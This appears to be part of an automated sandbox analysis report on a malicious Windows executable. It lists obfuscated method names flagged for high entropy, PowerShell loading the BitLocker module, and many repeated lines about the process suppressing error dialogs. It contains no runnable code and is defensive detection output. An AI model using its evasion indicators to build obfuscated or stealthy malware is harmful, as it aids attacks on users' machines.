Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, iCyBrjAQ0K85ZxmtDg.cs	High entropy of concatenated method names: 'wCpndiiBJ4', 'N4unViW4AK', 'y96KOoCbOs', 'CO9KmUR7cl', 'ME1KMqZnZ4', 'YclKgGhLLU', 'UbcKXrh8dH', 'vNuKBjdKEa', 'MU0K8avwpJ', 'aQ9KLCPQpX'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, dynp2dHAyXLHRUbXBm.cs	High entropy of concatenated method names: 'NlXWjnVnXi', 'x7pWbD1OyD', 'E6YW25jjqc', 'jxvWTG6CyB', 'AmtWwDgTAV', 'hg6W1YPviX', 'LrJO9qUhSMlf9uojpL', 'RWbL0vH3Rjcc24eaNR', 'zxqWWAwbno', 'QlUW7uPPkx'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, CiqvKlplBI3tKjcx8Y.cs	High entropy of concatenated method names: 'hKHGKFanLs', 'xuRGnTxm4O', 'EATG6bCknV', 'lFNGj06W8d', 'HLtGqhCBgp', 'ETaGbsDlmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.cs	High entropy of concatenated method names: 'yDK7tqICGy', 'MZy7afHjIe', 'KQB7RKHOLZ', 'FRu7KnRmTZ', 'xfy7njfXsi', 'JLc76mtbCi', 'jwC7jen05i', 'JqN7beNc4P', 'raD75MWCph', 'QZX72IgiBW'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, mgDE1gRRmkiAifKFan.cs	High entropy of concatenated method names: 'Dispose', 'g9IW0Zl9Rp', 'HnCDuuhGpF', 'BOYXJTntj5', 'u54Wp0vphN', 'cV9WzHHht1', 'ProcessDialogKey', 'P5KDPJig8h', 'bZiDWkgbJw', 'rOuDD4iqvK'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, bPA6G0Kn1bOXlAplBO.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z9sD0KHo5P', 'WsqDpo5BcS', 'LaRDzYIcHL', 'NV87PCoist', 'JN47WO1yv6', 'JRc7DoFQLW', 'NtO77kZOnS', 'ThnTqdLwZlGKdnoIuXR'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LuU7TjJm9sXp1wJX8A.cs	High entropy of concatenated method names: 'ToString', 'y6l1ZqN899', 'wxl1u15tbT', 'Itf1OGuUSf', 'XBu1mfFo1K', 'Qlk1Mp6NEW', 'P8n1gqhXhq', 'tjJ1X5ZHth', 'vjN1BeHSgS', 'Y0G18CNvst'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, xBHHG6XsKDbNNLtgdy.cs	High entropy of concatenated method names: 'IY9jatkoX3', 'odJjKWW5Lg', 'jV5j6e1cCI', 'Q2S6pgEb9y', 'jbZ6zjmY6Z', 'CfrjPtiW6R', 'EZ6jWxn3NX', 'yDsjD7LEC6', 'IS2j7QStgF', 'XjCjHRYnqu'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	High entropy of concatenated method names: 'ON4RInxt91', 'jJsRc0nkMb', 'ApwRJ39qfS', 'U5eRf5PSQV', 'PFPReOlp6S', 'hdIRSyE7rh', 'hYDRi0iLUy', 'F8YRNMGitG', 'xG3R0DKa43', 'u8wRpysyKE'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, tsKFQRyS8x1tRqYrqR.cs	High entropy of concatenated method names: 'p7sEkerBwW', 'I19EC4ZAkx', 'hOSE9falXf', 'rZyEuOvAyx', 'c8XEmIQILl', 'Fm1EM1kOKf', 'SfTEX4N8xn', 'VPUEB5EYtN', 'wTCELe0IkX', 'h7LEZCOBCV'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, Rnlu3s8n8UKbY8UFJb.cs	High entropy of concatenated method names: 'pB2jh9voWO', 'hQejUt8O5j', 'eyfjYSEPGv', 's3hjxGwwZl', 'WK9jd1eB6H', 'eZXj4833YJ', 'pYHjVIj5Ht', 'JBIjk1bAGd', 'YJJjCNqWrc', 'AfCjAf9prE'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, uvatpAIBg4sIxQSbeU.cs	High entropy of concatenated method names: 'YLmwL6nIF1', 'ThgwvYmiVE', 'DCewII4v9O', 'S6swcgD2wI', 'J66wugNMXv', 'GnvwOnh33g', 'tRZwmuRfoD', 'otVwMNrqDw', 'u7hwg5sWGy', 'rZswXW1jZ2'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, geRufZzvwFwWKwr4Qj.cs	High entropy of concatenated method names: 'UUVG4t1bQd', 'hgDGkSgDwM', 'XXuGCiw1gc', 'kayG95e0ma', 'AOKGuglo1H', 'CddGm7oGc1', 'r5MGM2UIDL', 'ncdGrcR66p', 'QvRGhM6e39', 'ocaGUfcWtl'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, XBqFKCC6Y5jjqc6xvG.cs	High entropy of concatenated method names: 'RmVKxAprnF', 'XdJK4Cf7jp', 'tGqKktiP7i', 'XMMKClaRQn', 'rU0Kw8Fe46', 'gK5K1t02Cr', 'mp8KQnVkT9', 'oCYKFJbdgi', 'iK4KqrrSMZ', 'v74KGNwL83'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, nAVng69YPviXSp80Uh.cs	High entropy of concatenated method names: 'ILq6tWNH5v', 'JOu6RNiwBx', 'UqE6nomfis', 'qWr6jYLjao', 'jpF6b5lHHR', 'p27ne7RSUc', 'H9NnSgLs63', 'HipniOUEvZ', 'lAgnNDsbSH', 'dCUn0ULXuu'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, Pr9NEjWPLjtjxwCTRTZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KknGZhPssi', 'UUqGvFwZHs', 'rYfGyFb623', 'n93GIq1A72', 'KctGcolUX2', 'VhIGJ02qgT', 'DqLGfkaKFX'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, ynfd59DTnk0P8IUUim.cs	High entropy of concatenated method names: 'X54Y1pc0G', 'tpvx1UyH0', 'AAi4JAUkp', 'fTBVZCwOB', 'WLhCVe6sg', 'A3fAS4YOY', 'MCUCwF8TJJfk98HXEC', 'LEVML925EIxHh4reXj', 'DvAFghZ5F', 'erIGCqNrl'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, OVbtgef29TOIYVcr1P.cs	High entropy of concatenated method names: 'mVJQ2FTMXV', 'CYTQT4RvWv', 'ToString', 'BblQapbXma', 'ND0QRS4PXv', 'nLSQKZmwI3', 'yW5Qn9BraN', 'tIlQ6A3ALO', 'jRKQjlpIAb', 'QFhQbuDiuH'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, hJig8h0WZikgbJwFOu.cs	High entropy of concatenated method names: 'xKLq9VeKRx', 'XpMquqvlqY', 'qyjqO7FWKI', 'LyVqmnd4pe', 'oXEqMOdKMQ', 'kJyqgNjxu8', 'yJUqXSDqXK', 'ntfqB2QA3j', 'PUIq8KtUFh', 'iDmqLZmB21'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, kedsymiHwR9IZl9Rpl.cs	High entropy of concatenated method names: 'TGoqw7NdG7', 'CygqQjoru6', 'JpiqqqymZj', 'cuCq3o6JRy', 'zDvql3CPql', 'Ux4qrwHry7', 'Dispose', 'cLEFaAxyOF', 'lH5FR3uRiC', 'qp1FKDgAne'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, QMS5wJSpvkKerolDJ1.cs	High entropy of concatenated method names: 'PGVQNMjm8W', 'zDNQpmVnAi', 'xfjFPuRPgU', 'jPLFWkXv4O', 'QRXQZtTHuq', 'kt1Qv2jqci', 'TNeQyqPMvE', 'oBaQIUqFJJ', 'xenQc4FcQC', 'L1SQJsYKga'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, rtUpFMWDBEDy9V0EA9v.cs	High entropy of concatenated method names: 'ToString', 'mMh3kZlNEo', 'daQ3C02ZFW', 'UPN3AJO2nj', 'Sni39vN8Gn', 'egP3uvUdJC', 'RI53OPvJCI', 'utG3mNO2D4', 'QFXNFRWUPPhW8yi5Nea', 'od4TV4WH96xh1EIeVAK'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, QS84t6WHerZ6peZei3s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MxWoqG79nY', 'pFUoGwsB4t', 'OcQo3x2LGL', 'tLsooO2OSU', 'tVmolNyx39', 'DrgosTm46X', 'HK6or54Jnn'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, oG17jiWWq4NBFriJ2sN.cs	High entropy of concatenated method names: 'IsOGpFnI4x', 'G22GzUyb7B', 'QYW3P5CgwI', 'QJh3WiTc30', 'q5h3DeNXqA', 'A3k37u005t', 'XFq3H4nyLM', 'gBs3toLdWq', 'ub53aUlVpX', 'UHO3R1t6kI'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, iCyBrjAQ0K85ZxmtDg.cs	High entropy of concatenated method names: 'wCpndiiBJ4', 'N4unViW4AK', 'y96KOoCbOs', 'CO9KmUR7cl', 'ME1KMqZnZ4', 'YclKgGhLLU', 'UbcKXrh8dH', 'vNuKBjdKEa', 'MU0K8avwpJ', 'aQ9KLCPQpX'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, dynp2dHAyXLHRUbXBm.cs	High entropy of concatenated method names: 'NlXWjnVnXi', 'x7pWbD1OyD', 'E6YW25jjqc', 'jxvWTG6CyB', 'AmtWwDgTAV', 'hg6W1YPviX', 'LrJO9qUhSMlf9uojpL', 'RWbL0vH3Rjcc24eaNR', 'zxqWWAwbno', 'QlUW7uPPkx'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, CiqvKlplBI3tKjcx8Y.cs	High entropy of concatenated method names: 'hKHGKFanLs', 'xuRGnTxm4O', 'EATG6bCknV', 'lFNGj06W8d', 'HLtGqhCBgp', 'ETaGbsDlmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.cs	High entropy of concatenated method names: 'yDK7tqICGy', 'MZy7afHjIe', 'KQB7RKHOLZ', 'FRu7KnRmTZ', 'xfy7njfXsi', 'JLc76mtbCi', 'jwC7jen05i', 'JqN7beNc4P', 'raD75MWCph', 'QZX72IgiBW'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, mgDE1gRRmkiAifKFan.cs	High entropy of concatenated method names: 'Dispose', 'g9IW0Zl9Rp', 'HnCDuuhGpF', 'BOYXJTntj5', 'u54Wp0vphN', 'cV9WzHHht1', 'ProcessDialogKey', 'P5KDPJig8h', 'bZiDWkgbJw', 'rOuDD4iqvK'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, bPA6G0Kn1bOXlAplBO.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z9sD0KHo5P', 'WsqDpo5BcS', 'LaRDzYIcHL', 'NV87PCoist', 'JN47WO1yv6', 'JRc7DoFQLW', 'NtO77kZOnS', 'ThnTqdLwZlGKdnoIuXR'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LuU7TjJm9sXp1wJX8A.cs	High entropy of concatenated method names: 'ToString', 'y6l1ZqN899', 'wxl1u15tbT', 'Itf1OGuUSf', 'XBu1mfFo1K', 'Qlk1Mp6NEW', 'P8n1gqhXhq', 'tjJ1X5ZHth', 'vjN1BeHSgS', 'Y0G18CNvst'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, xBHHG6XsKDbNNLtgdy.cs	High entropy of concatenated method names: 'IY9jatkoX3', 'odJjKWW5Lg', 'jV5j6e1cCI', 'Q2S6pgEb9y', 'jbZ6zjmY6Z', 'CfrjPtiW6R', 'EZ6jWxn3NX', 'yDsjD7LEC6', 'IS2j7QStgF', 'XjCjHRYnqu'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	High entropy of concatenated method names: 'ON4RInxt91', 'jJsRc0nkMb', 'ApwRJ39qfS', 'U5eRf5PSQV', 'PFPReOlp6S', 'hdIRSyE7rh', 'hYDRi0iLUy', 'F8YRNMGitG', 'xG3R0DKa43', 'u8wRpysyKE'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, tsKFQRyS8x1tRqYrqR.cs	High entropy of concatenated method names: 'p7sEkerBwW', 'I19EC4ZAkx', 'hOSE9falXf', 'rZyEuOvAyx', 'c8XEmIQILl', 'Fm1EM1kOKf', 'SfTEX4N8xn', 'VPUEB5EYtN', 'wTCELe0IkX', 'h7LEZCOBCV'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, Rnlu3s8n8UKbY8UFJb.cs	High entropy of concatenated method names: 'pB2jh9voWO', 'hQejUt8O5j', 'eyfjYSEPGv', 's3hjxGwwZl', 'WK9jd1eB6H', 'eZXj4833YJ', 'pYHjVIj5Ht', 'JBIjk1bAGd', 'YJJjCNqWrc', 'AfCjAf9prE'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, uvatpAIBg4sIxQSbeU.cs	High entropy of concatenated method names: 'YLmwL6nIF1', 'ThgwvYmiVE', 'DCewII4v9O', 'S6swcgD2wI', 'J66wugNMXv', 'GnvwOnh33g', 'tRZwmuRfoD', 'otVwMNrqDw', 'u7hwg5sWGy', 'rZswXW1jZ2'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, geRufZzvwFwWKwr4Qj.cs	High entropy of concatenated method names: 'UUVG4t1bQd', 'hgDGkSgDwM', 'XXuGCiw1gc', 'kayG95e0ma', 'AOKGuglo1H', 'CddGm7oGc1', 'r5MGM2UIDL', 'ncdGrcR66p', 'QvRGhM6e39', 'ocaGUfcWtl'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, XBqFKCC6Y5jjqc6xvG.cs	High entropy of concatenated method names: 'RmVKxAprnF', 'XdJK4Cf7jp', 'tGqKktiP7i', 'XMMKClaRQn', 'rU0Kw8Fe46', 'gK5K1t02Cr', 'mp8KQnVkT9', 'oCYKFJbdgi', 'iK4KqrrSMZ', 'v74KGNwL83'
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, nAVng69YPviXSp80Uh.cs	High entropy of concatenated method names: 'ILq6tWNH5v', 'JOu6RNiwBx', 'UqE6nomfis', 'qWr6jYLjao', 'jpF6b5lHHR', 'p27ne7RSUc', 'H9NnSgLs63', 'HipniOUEvZ', 'lAgnNDsbSH', 'dCUn0ULXuu'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
